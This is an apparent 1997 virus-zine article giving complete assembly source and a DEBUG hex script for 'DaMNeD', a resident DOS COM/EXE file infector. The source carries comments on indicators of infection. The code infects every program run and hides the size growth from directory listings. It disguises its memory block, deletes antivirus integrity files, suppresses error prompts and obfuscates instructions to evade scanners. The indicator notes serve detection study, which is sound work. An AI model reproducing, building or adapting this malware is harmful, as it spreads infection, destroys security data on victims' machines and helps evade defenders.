
SLAM3.003: Resident semi-stealth EXE/COM infector ] DaMNeD [ by DC [SLAM]

Published in 
Slam
 · 2 years ago

] DaMNeD Virus [

This virus is a resident semi-stealth EXE/COM infector that infects, of course, on execute. It also restores the file's time/date, kills some bad files, doesn't infect AVs, intercepts interrupt 24h, hides its size with DTA/FCB directory stealth, and works very well under Windows 95 — but in MS-DOS windows neither directory stealth method works :( I'm working on a Windows 95/DOS directory stealth...


To compile:

 TASM /M DAMNED.ASM 
TLINK DAMNED.OBJ
EXE2BIN DAMNED.OBJ DAMNED.COM


Delete other files:

 DEL DAMNED.OBJ 
DEL DAMNED.MAP


.

; DaMNeD (1997): memory-resident, semi-stealth DOS COM/EXE appender.
; Assembler: TASM, Intel syntax, 16-bit real mode.  Assembled as a .COM
; image at org 0; every data reference in the pre-resident part is
; relocated through bp (the load delta computed at get_delta).
; Indicators that can be read straight off this source:
;   - host files grow by v_size = 445h (1093) bytes (RCX 0445 in the
;     DEBUG script at the end of the page);
;   - infection marker: directory-entry time field with seconds/2 = 1Dh,
;     i.e. a timestamp ending in 58 seconds;
;   - EXE hosts additionally carry the word "DC" in the MZ checksum
;     field (header offset 12h);
;   - plaintext strings "SLAM" x6 and "DaMNeD Virus (c) 1997, Dark Chakal
;     [SLAM]" inside the body;
;   - the resident copy answers INT 21h AH=0Bh, BX="SL", CX="AM" with
;     AX="OK" and lives in an MCB rewritten to look DOS-owned (owner 0008h);
;   - on every EXEC it deletes eight AV integrity/data files (see `bad`,
;     bare names, so resolved against the current directory) and hooks
;     INT 24h so write errors produce no Abort/Retry/Fail prompt.
.model tiny 
.code
jumps ; for long jumps
org 0

;-----------------------------------------------------------------------
; start: entry of the appended body, reached through the host's patched
; entry point.  Computes the load delta, asks whether a copy is already
; resident, installs itself at the top of conventional memory when not,
; then hands control to the original COM bytes / EXE entry.
; Not a callable routine: it never returns, it jumps into the host.
;-----------------------------------------------------------------------
start: call get_delta ; get delta-offs
get_delta:
mov di,sp
mov ax,ss:[di] ; ax = return address pushed by the call above
mov bp,ax
sub bp,offset get_delta ; bp = load delta; data refs below add [bp]

push es ; save es
push ds ; save ds

mov ah,0bh ; residency check
mov bx,"SL" ;
mov cx,"AM" ; SLAM here?
int 21h ; "are-you-there" query, answered by int21 below with AX="OK"

cmp ax,"OK" ; yepz
je return_file ; return from original file...

push es ; save es

mov ax,3521h ; get adress of interrupt 21
int 21h

mov word ptr cs:[i21][bp],bx ; save it (the far jmp at `dos:` chains to it)
mov word ptr cs:[i21][bp][2],es

pop es ; restore es

mov ah,4ah ; routine to make resident
mov bx,-1 ; resize own block to an impossible size: DOS fails
int 21h ; and reports the largest available size in bx

sub bx,(v_size+15)/16+1 ; shrink own block by the virus size in paragraphs (+1, presumably for the new block's MCB)
mov ah,4ah
int 21h

mov bx,(v_size+15)/16 ; then allocate exactly the virus size from the freed top
nop
mov ah,48h
int 21h

mov es,ax ; es = segment of the new (resident) block

push es
pop ax
dec ax ; This routine is only for F-PROT
push ax ; cannot detect this virus a new
pop ds ; variant of CHILL! B)
; ds = es-1 = the new block's MCB.  The two stores below rewrite it so the
; block looks like DOS-owned memory: byte 0 = 'Z' (last in chain), word at
; offset 1 = owner PSP 0008h (DOS).  Memory-map tools then list it as
; system memory rather than as an orphaned TSR block.

xor di,di
mov ax,"Z"
mov word ptr ds:[di+0],ax ; MCB[0] = 'Z' (MCB[1] gets 0 here, overwritten just below)
sub ax,"Z" ; AX="Z" sub AX,"Z" AX=0
add ax,0008 ; ADD AX,8 AX=8
mov word ptr ds:[di+1],ax ; Mark DOS Block (owner field = 0008h)

push cs ; CS=DS
pop ds

mov si,bp ; Si=OFFSET OF START
mov cx,v_size
rep movsb ; copy v_size bytes from cs:bp (start) to es:0

push es
pop ds

lea dx,int21 ; put resident!
mov ax,2125h ; becomes AX=2521h (set INT 21h vector) after the xchg;
xchg ah,al ; the immediate is written swapped, so a literal B8 21 25 signature will not match
int 21h

return_file:
pop ds ; restore original
pop es ; DS and ES

cmp cs:[com_exe][bp],1 ; It's a COM or EXE file?
je return_exe ; If EXE jump to exe return

return_com:
lea si,saved_bytes+bp ; si = saved bytes
mov cx,200h ; cx = 200h >> 2 << 1 = 100h (COM entry offset, computed rather than written literally)
shr cx,2
shl cx,1
push cx
mov di,cx ; di = 100h
mov cx,3
rep movsb ; move the bytes to CS:[100h]

pop cx
jmp cx ; return.. (to cs:100h, original 3 host bytes restored)

saved_bytes:
; first 3 bytes of the COM host, copied here at infection time;
; a freshly assembled dropper holds int 20h / nop (= terminate)

int 20h
nop

com_exe db ? ; com / exe ? (0 = COM, 1 = EXE; written by infect_file / infect_exe)

return_exe:
; ax = PSP segment; adding 10h (the PSP is 100h bytes = 10h paragraphs)
; gives the load segment, which relocates the saved header CS and SS so
; the far jump below lands on the host's original entry point.

mov ax,es ; ax = PSP
add ax,10h ; ax = PSP+10h
add cs:[_cs+bp],ax ; save this address in CS:IP

cli
mov sp,word ptr cs:[_sp+bp] ; adjust SP
add ax,word ptr cs:[_ss+bp] ; adjust SS
mov ss,ax
sti

sub ax,ax ; zer0 regz!
sub dx,dx
xor bx,bx
sub cx,cx
xor di,di
sub si,si

db 0eah ; far jmp opcode; its operand is the patched _ip:_cs pair below
_ip dw 00000h ; original header IP (stored by infect_exe)
_cs dw 00000h ; original header CS (relocated above)
_sp dw ? ; original header SP
_ss dw ? ; original header SS (relocated above)

;-----------------------------------------------------------------------
; int21: resident INT 21h hook installed by start.
; Dispatch: AH=11h/12h (FCB find first/next) and AH=4Eh/4Fh (handle find
; first/next) go to the size-stealth routines; AX=4B00h (EXEC) goes to
; infect_file; AH=0Bh with BX="SL", CX="AM" is the "are-you-there" query
; and is answered with AX="OK"; everything else chains to the saved
; original vector through the far jump at `dos:`.
; Analyst note: the compares are split with xchg ah,al and push/mov/cmp
; so the plain encodings of cmp ah,11h / cmp ax,4B00h never appear.
;-----------------------------------------------------------------------
int21:
pushf ; flags copy; also serves as the IRET frame for `push cs / call dos`
xchg ah,al
cmp al,11h ; fcb find?
xchg ah,al
jz fcb_stealth
xchg ah,al
cmp al,12h ; fcb findnext?
xchg ah,al
jz fcb_stealth
cmp ah,4eh ; dta find?
jz dta_stealth
cmp ah,4fh ; dta findnext?
jz dta_stealth
push bx
mov bx,4b00h
cmp ax,bx ; execute?
pop bx
jz infect_file
cmp ah,0bh ; residency check?
jnz dos_1
cmp bx,"SL"
jnz dos_1
cmp cx,"AM"
jnz dos_1
mov ax,"OK" ; damned is here!
popf
iret

dos_1:
popf ; drop the flags copy, then fall into the original handler
dos:
db 0eah ; jmp to oldint21 (far jmp opcode; operand is i21 below)
i21 dd ? ; original INT 21h vector, filled in by start
ret

;-----------------------------------------------------------------------
; fcb_stealth: size stealth for FCB find-first/next (AH=11h/12h).
; Lets the original handler fill the DTA, then, if the caller's PSP is its
; own parent (presumably the command shell, i.e. DIR output) and the entry
; carries the infection marker, subtracts v_size from the size field.
; Stack: the pushf at int21 entry + push cs + call dos form an IRET frame
; for the original handler, which therefore returns here; retf 2 finally
; discards the caller's own pushed flags.
;-----------------------------------------------------------------------
fcb_stealth:
push cs ; save code segment
call dos ; call int 21h
or al,al ; error? (FCB find: AL=0 found, 0FFh not found)
jnz no_files ; yeah, return...

push ax bx es ; push some regs.

mov ah,51h ; get PSP
int 21h
mov es,bx
cmp bx,es:[16h] ; it's a good PSP? (PSP+16h = parent PSP; equal when the shell is the caller)
jnz no_psp ; no??? return...

mov bx,dx
mov al,[bx] ; al = current drive (first byte of the caller's FCB, ds:dx)
push ax
mov ah,2fh ; get DTA
int 21h
pop ax
inc al
jnz no_fix ; extended fcb? (drive byte 0FFh => extended FCB, skip its 7-byte prefix)
add bx,7

no_fix:
mov al,byte ptr es:[bx+17h] ; get seconds field... (low byte of the entry's time word)
and al,1fh ; test for infection (seconds/2 field)
cmp al,1dh ; infected? (marker 1Dh = 58 seconds)
jnz no_psp ; no? return...

hide_fsize:
sub word ptr es:[bx+1dh],v_size ; subtract v_size from the low word of the entry's size
; from filesize
no_psp:
pop es bx ax ; pop pushed regs...
no_files:
retf 2 ; return...

;-----------------------------------------------------------------------
; dta_stealth: size stealth for handle-based find-first/next (AH=4Eh/4Fh).
; Same scheme as fcb_stealth: run the original call, then if the find
; record in the DTA carries the 1Dh seconds marker, subtract v_size from
; the low word of its size field (find record: time at 16h, size at 1Ah).
; Unlike fcb_stealth there is no PSP check, so every caller sees the
; reduced size.
;-----------------------------------------------------------------------
dta_stealth:
push cs ; save code segment
call dos ; call int 21h
jc no_files2 ; err? no files found

pushf ; save flags and
push ax bx es ; some regs.

mov ah,2fh ; get the DTA to es:bx
int 21h

mov ax,es:[bx+16h] ; get the time
and al,1fh ; unmask seconds
cmp al,1dh ; infected? (marker 1Dh = 58 seconds)
jnz not_inf ; no? return

hide: sub word ptr es:[bx+1ah],v_size ; subtract the vsize (low word only)
; from filesize
not_inf:
pop es bx ax ; pop the pushed regs
popf ; restore flags...
no_files2:
retf 2

; Resident data area.  `buffer` and `bad` are stored in plaintext in every
; infected file and are the natural signature material for this family.
i24 dd ? ; original int24
buffer db 6 dup("SLAM") ; buffer = 6 * 4 bytes "SLAM" (reused as 24-byte host-header scratch)
f_size dd ? ; buffer = 24(dec) 18(hex) -> host size as returned by the seek to EOF
f_name dd ? ; far pointer (ds:dx) to the file name passed to EXEC
time dw ? ; host time word; the 1Dh seconds marker is forced into it at close_exit
date dw ? ; host date word
no_bad dw 8 ; number of bad files...
file db 13 dup (0) ; scratch: one ASCIIZ name from `bad` at a time
bad db "ANTI-VIR.DAT",0 ; bad files... (AV integrity/checksum databases and signature files)
db "CHKLIST.CPS",0
db "CHKLIST.MS",0
db "AVP.SET",0
db "FINDVIRU.DRV",0
db "AVP.OVL",0
db "SCAN.DAT",0
db "SIGN.DEF",0

;-----------------------------------------------------------------------
; infect_file: reached from int21 on AX=4B00h (EXEC), before the file runs.
; Flow: skip names matched by check_for_av; hook INT 24h; open the file
; R/W; read its time/date and skip if the seconds marker is set; read the
; first 18h bytes; seek to EOF; branch to infect_exe on an MZ header,
; else append the body and patch a jmp into the first 3 bytes; rewrite the
; timestamp with the marker; close; delete the eight `bad` files from the
; current directory; restore INT 24h; chain to the original EXEC.
; Analyst notes: the write (40h), set-attributes (4301h), set-time (5701h)
; and set-vector (2524h) calls are all built from a neighbouring value
; plus inc/xchg, so literal mov ah,40h style patterns are absent.
;-----------------------------------------------------------------------
infect_file:
push ax bx cx dx ds es di si ; push some regs...

mov word ptr cs:[f_name],dx ; save executed file
mov word ptr cs:[f_name][2],ds

call check_for_av ; check for av's...
jc exit_now ; don't infect...

mov ax,3524h ; get error handler.
int 21h

mov word ptr cs:[i24],bx ; save it
mov word ptr cs:[i24][2],es

mov ax,2425h ; put the new int24 (AX=2524h after the xchg)
push cs
pop ds
lea dx,error_handler
xchg al,ah
int 21h

mov dx,word ptr cs:[f_name] ; restore filename
mov ds,word ptr cs:[f_name][2]

mov ax,3D02h ; open it R/W acess
int 21h

mov bx,ax ; handle = AX = BX

push cs cs
pop es ds

mov ax,5700h ; get time
int 21h

mov word ptr cs:[time],cx
mov word ptr cs:[date],dx

and cl,1fh ; unmask secs.
cmp cl,1dh ; infected?!?! (seconds marker already present)
je close_exit ; hmmm, next...

mov ax,3f00h ; read file...
lea dx,buffer
mov cx,18h ; 18h bytes (24 dec)
int 21h

mov ax,4202h ; go to -EOF- (cx:dx = 0 offset from end; dx:ax returns the size)
mov cx,ax
sub cx,4202h
mov dx,cx
int 21h

mov word ptr cs:[f_size],ax ; save filesize
mov word ptr cs:[f_size][2],dx

mov cl,byte ptr buffer ; MZ signature check (sum of the first two bytes vs 'M'+'Z')
add cl,byte ptr buffer+1
mov al,"M"
add al,"Z"
cmp al,cl
je infect_exe

; COM path: build "jmp near <size-3>" so the patched entry lands on the
; appended body, saving the original 3 bytes into saved_bytes.
mov ax,word ptr cs:[f_size] ; sub ax,3 ;)
sub ax,8
add ax,5
lea si,buffer ; save orig. bytes
lea di,saved_bytes
movsw
movsb

mov cl,0e9h ; cl = jump
mov byte ptr buffer,cl ; put the jmp
mov word ptr buffer+1,ax ; in the buffer
mov cs:[com_exe],0 ; mark! it's a com

mov ah,3fh ; write virus (AH=40h after the inc; file pointer is at EOF)
lea dx,start
mov cx,v_size
inc ah
int 21h

mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,4200h
mov dx,cx
int 21h

mov ah,3fh ; write the header
lea dx,buffer ; (jump+large)
mov cx,3
inc ah ;
int 21h

close_exit:
; Restore the saved time/date but force the seconds/2 field to 1Dh (the
; or/and pair sets bits 0,2,3,4 and clears bit 1), then AX=5701h.

mov ax,5700h ; write the new time
mov cx,word ptr cs:[time]
mov dx,word ptr cs:[date]
or cl,1dh
and cl,0fdh
inc al
int 21h
exit_close:
mov ax,3e00h ; close file
int 21h

; Payload: for each of the no_bad ASCIIZ names in `bad`, copy it into
; `file`, clear its attributes (AX=4301h, CX=0 removes read-only) and
; delete it.  Runs on every EXEC that gets this far, infected or not.
lea si,bad ; bad files...
mov cx,cs:[no_bad] ; cx=number of files
ext:
lea di,file ; di=offset of file
fuck_av:
lodsb
cmp al,0
jz delete
stosb
jmp fuck_av

delete:
xor al,al
stosb

push cx

mov ax,4300h ; set attribs... (AX=4301h after the inc)
inc al
xor cx,cx
lea dx,file
int 21h

mov ah,41h ; delete bad file...
lea dx,file
int 21h

pop cx
loop ext

mov ax,2425h ; restore the new i24 (AX=2524h after the xchg)
mov dx,word ptr cs:[i24] ; handler
mov ds,word ptr cs:[i24][2]
xchg ah,al
int 21h

exit_now:
pop si di es ds dx cx bx ax

jmp dos_1 ; drop the flags copy and run the original EXEC on the (now modified) file

db 0
db "DaMNeD Virus (c) 1997, Dark Chakal [SLAM]" ; plaintext in every infected file
db 0

;-----------------------------------------------------------------------
; infect_exe: EXE branch of infect_file (bx = handle, buffer = first 18h
; header bytes, f_size = host size, file pointer at EOF).
; Skips files whose relocation-table offset (18h) is 40h (new-style
; Windows executables) and files already carrying "DC" in the checksum
; field (12h).  Otherwise saves the header CS:IP / SS:SP into the _ip.._ss
; slots, points the entry at the appended body (load-module offset in
; paragraphs -> CS, remainder -> IP), writes the "DC" marker, recomputes
; the page count / last-page size for size+v_size, appends the body and
; rewrites the 18h-byte header, then joins close_exit.
; Detection: MZ files with 4344h ("DC") at 12h, entry CS:IP pointing at
; the last 445h bytes, timestamp seconds = 58.
;-----------------------------------------------------------------------
infect_exe:
cmp word ptr buffer+18h,"@" ; it's a WiNEXE? (reloc table offset 40h => NE/PE style header)
jz exit_close ; yepz!

cmp word ptr buffer+12h,"DC" ; second infection
jz exit_close ; marker...

mov ax,word ptr cs:[f_size] ; restore f_size
mov dx,word ptr cs:[f_size][2]

mov cx,word ptr [buffer+14h] ; save CS:IP
mov cs:[_ip],cx
mov cx,word ptr [buffer+16h]
mov cs:[_cs],cx
mov cx,word ptr [buffer+10h] ; save SS:SP
mov cs:[_sp],cx
mov cx,word ptr [buffer+0eh]
mov cs:[_ss],cx

mov cx,word ptr [buffer+8] ; convert header size
shl cx,4 ; from paragraphs to bytes
sub ax,cx ; sub from filesize
sbb dx,0

mov cx,10h ; divide by paragraphs: ax = load-module paragraphs (new CS), dx = remainder (new IP)
div cx

mov word ptr [buffer+14h],dx ; put the new IP
mov word ptr [buffer+16h],ax ; put the new CS
mov word ptr [buffer+12h],"DC" ; put the inf. mark.
; Dark Chakal ;)

mov ax,word ptr cs:[f_size] ; restore filesize
mov dx,word ptr cs:[f_size][2]
add ax,v_size ; ax=filesize+v_size
adc dx,0

mov cx,200h ; divide by pages (512 bytes): ax = pages, dx = bytes in last page
div cx

or dx,dx ; it's same page?
jz none ; yepz, no increment
inc ax
none:
mov word ptr [buffer+2],dx ; save it (bytes in last page)
mov word ptr [buffer+4],ax ; (page count)

mov cs:[com_exe],1 ; mark! it's a exe file

mov ah,3fh ; write virus (AH=40h after the inc; pointer still at EOF)
lea dx,start
mov cx,v_size
inc ah
int 21h

mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,ax
mov dx,cx
int 21h

mov ah,3fh ; write buffer (header)
lea dx,buffer
mov cx,18h
inc ah
int 21h

jmp close_exit


;-----------------------------------------------------------------------
; check_for_av: name filter called from infect_file with ds:dx = the EXEC
; file name.  Scans to the first '.', expects "EXE" after it, then looks
; at the two characters before the '.' and sets CF when they are "AV",
; "AN" or "TO" (word constants are stored low byte first, so "VA" matches
; the bytes 'A','V', etc.).  CF=1 => caller skips the file.
; In:  ds:dx = ASCIIZ file name.  Out: CF.  Clobbers al/ax, si, flags.
; NOTE(review): after the lodsb at cmp ax,"E", ah still holds the 'X' from
; the preceding lodsw, so the 16-bit compare against 0045h appears unable
; to match — verify; if so the exclusion never triggers and such files are
; infected like any other.
;-----------------------------------------------------------------------
check_for_av:
mov si,dx
check_av:
lodsb
cmp al,"." ; scan forward to the extension dot
jnz check_av
lodsw
cmp ax,"XE" ; bytes 'E','X' after the dot
jnz good
lodsb
cmp ax,"E"
jnz good
sub si,6 ; back to the two characters before the dot
lodsw
cmp ax,"VA" ; bytes 'A','V'
jz av_found
sub si,2
lodsw
cmp ax,"NA" ; bytes 'A','N'
jz av_found
sub si,2
lodsw
cmp ax,"OT" ; bytes 'T','O'
jz av_found

good: clc
ret
av_found:
stc
ret

;-----------------------------------------------------------------------
; error_handler: INT 24h (critical error) replacement installed for the
; duration of infect_file.  Returns AL=3 ("fail the call"), so a write
; error (e.g. write-protected media) silently fails the DOS call instead
; of showing the Abort/Retry/Fail prompt — the only user-visible sign of
; infection activity is suppressed.
;-----------------------------------------------------------------------
error_handler:
mov al,3
iret


; Total body length; evaluates to 445h (1093 bytes) per the DEBUG script
; below (RCX 0445).  Appended to every host, so infected files grow by
; exactly this amount (before the directory stealth hides it).
v_size equ $-start

end start

====That's for everyone without an assembler================================

N DAMNED.COM
E 0100 E8 00 00 8B FC 36 8B 05 8B E8 81 ED 03 00 06 1E
E 0110 B4 0B BB 4C 53 B9 4D 41 CD 21 3D 4B 4F 74 53 06
E 0120 B8 21 35 CD 21 2E 89 9E 04 01 2E 8C 86 06 01 07
E 0130 B4 4A BB FF FF CD 21 83 EB 46 B4 4A CD 21 BB 45
E 0140 00 90 B4 48 CD 21 8E C0 06 58 48 50 1F 33 FF B8
E 0150 5A 00 89 05 2D 5A 00 05 08 00 89 45 01 0E 1F 8B
E 0160 F5 B9 45 04 F3 A4 06 1F BA C5 00 B8 25 21 86 E0
E 0170 CD 21 1F 07 2E 80 BE 97 00 01 74 1C 8D B6 94 00
E 0180 B9 00 02 D1 E9 D1 E9 D1 E1 51 8B F9 B9 03 00 F3
E 0190 A4 59 FF E1 CD 20 90 00 8C C0 05 10 00 2E 01 86
E 01A0 BF 00 FA 2E 8B A6 C1 00 2E 03 86 C3 00 8E D0 FB
E 01B0 2B C0 2B D2 33 DB 2B C9 33 FF 2B F6 EA 00 00 00
E 01C0 00 00 00 00 00 9C 86 E0 3C 11 86 E0 74 3B 86 E0
E 01D0 3C 12 86 E0 74 33 80 FC 4E 74 6D 80 FC 4F 74 68
E 01E0 53 BB 00 4B 3B C3 5B 75 03 E9 0B 01 80 FC 0B 75
E 01F0 11 81 FB 4C 53 75 0B 81 F9 4D 41 75 05 B8 4B 4F
E 0200 9D CF 9D EA 00 00 00 00 C3 0E E8 F6 FF 0A C0 75
E 0210 34 50 53 06 B4 51 CD 21 8E C3 26 3B 1E 16 00 75
E 0220 21 8B DA 8A 07 50 B4 2F CD 21 58 FE C0 75 03 83
E 0230 C3 07 26 8A 47 17 24 1F 3C 1D 75 06 26 81 6F 1D
E 0240 45 04 07 5B 58 CA 02 00 0E E8 B7 FF 72 1C 9C 50
E 0250 53 06 B4 2F CD 21 26 8B 47 16 24 1F 3C 1D 75 06
E 0260 26 81 6F 1A 45 04 07 5B 58 9D CA 02 00 00 00 00
E 0270 00 53 4C 41 4D 53 4C 41 4D 53 4C 41 4D 53 4C 41
E 0280 4D 53 4C 41 4D 53 4C 41 4D 00 00 00 00 00 00 00
E 0290 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00
E 02A0 00 00 00 00 41 4E 54 49 2D 56 49 52 2E 44 41 54
E 02B0 00 43 48 4B 4C 49 53 54 2E 43 50 53 00 43 48 4B
E 02C0 4C 49 53 54 2E 4D 53 00 41 56 50 2E 53 45 54 00
E 02D0 46 49 4E 44 56 49 52 55 2E 44 52 56 00 41 56 50
E 02E0 2E 4F 56 4C 00 53 43 41 4E 2E 44 41 54 00 53 49
E 02F0 47 4E 2E 44 45 46 00 50 53 51 52 1E 06 57 56 2E
E 0300 89 16 8D 01 2E 8C 1E 8F 01 E8 04 02 73 03 E9 1B
E 0310 01 B8 24 35 CD 21 2E 89 1E 6D 01 2E 8C 06 6F 01
E 0320 B8 25 24 0E 1F BA 42 04 86 C4 CD 21 2E 8B 16 8D
E 0330 01 2E 8E 1E 8F 01 B8 02 3D CD 21 8B D8 0E 0E 07
E 0340 1F B8 00 57 CD 21 2E 89 0E 91 01 2E 89 16 93 01
E 0350 80 E1 1F 80 F9 1D 74 7A B8 00 3F BA 71 01 B9 18
E 0360 00 CD 21 B8 02 42 8B C8 81 E9 02 42 8B D1 CD 21
E 0370 2E A3 89 01 2E 89 16 8B 01 8A 0E 71 01 02 0E 72
E 0380 01 B0 4D 04 5A 3A C1 75 03 E9 D6 00 2E A1 89 01
E 0390 2D 08 00 05 05 00 BE 71 01 BF 94 00 A5 A4 B1 E9
E 03A0 88 0E 71 01 A3 72 01 2E C6 06 97 00 00 B4 3F BA
E 03B0 00 00 B9 45 04 FE C4 CD 21 B8 00 42 8B C8 81 E9
E 03C0 00 42 8B D1 CD 21 B4 3F BA 71 01 B9 03 00 FE C4
E 03D0 CD 21 B8 00 57 2E 8B 0E 91 01 2E 8B 16 93 01 80
E 03E0 C9 1D 80 E1 FD FE C0 CD 21 B8 00 3E CD 21 BE A4
E 03F0 01 2E 8B 0E 95 01 BF 97 01 AC 3C 00 74 03 AA EB
E 0400 F8 32 C0 AA 51 B8 00 43 FE C0 33 C9 BA 97 01 CD
E 0410 21 B4 41 BA 97 01 CD 21 59 E2 DB B8 25 24 2E 8B
E 0420 16 6D 01 2E 8E 1E 6F 01 86 E0 CD 21 5E 5F 07 1F
E 0430 5A 59 5B 58 E9 CB FD 00 44 61 4D 4E 65 44 20 56
E 0440 69 72 75 73 20 28 63 29 20 31 39 39 37 2C 20 44
E 0450 61 72 6B 20 43 68 61 6B 61 6C 20 5B 53 4C 41 4D
E 0460 5D 00 83 3E 89 01 40 74 80 81 3E 83 01 43 44 75
E 0470 03 E9 75 FF 2E A1 89 01 2E 8B 16 8B 01 8B 0E 85
E 0480 01 2E 89 0E BD 00 8B 0E 87 01 2E 89 0E BF 00 8B
E 0490 0E 81 01 2E 89 0E C1 00 8B 0E 7F 01 2E 89 0E C3
E 04A0 00 8B 0E 79 01 D1 E1 D1 E1 D1 E1 D1 E1 2B C1 83
E 04B0 DA 00 B9 10 00 F7 F1 89 16 85 01 A3 87 01 C7 06
E 04C0 83 01 43 44 2E A1 89 01 2E 8B 16 8B 01 05 45 04
E 04D0 83 D2 00 B9 00 02 F7 F1 0B D2 74 01 40 89 16 73
E 04E0 01 A3 75 01 2E C6 06 97 00 01 B4 3F BA 00 00 B9
E 04F0 45 04 FE C4 CD 21 B8 00 42 8B C8 2B C8 8B D1 CD
E 0500 21 B4 3F BA 71 01 B9 18 00 FE C4 CD 21 E9 C2 FE
E 0510 8B F2 AC 3C 2E 75 FB AD 3D 45 58 75 21 AC 3D 45
E 0520 00 75 1B 83 EE 06 AD 3D 41 56 74 14 83 EE 02 AD
E 0530 3D 41 4E 74 0B 83 EE 02 AD 3D 54 4F 74 02 F8 C3
E 0540 F9 C3 B0 03 CF
RCX
0445
W
Q

===========================================================================
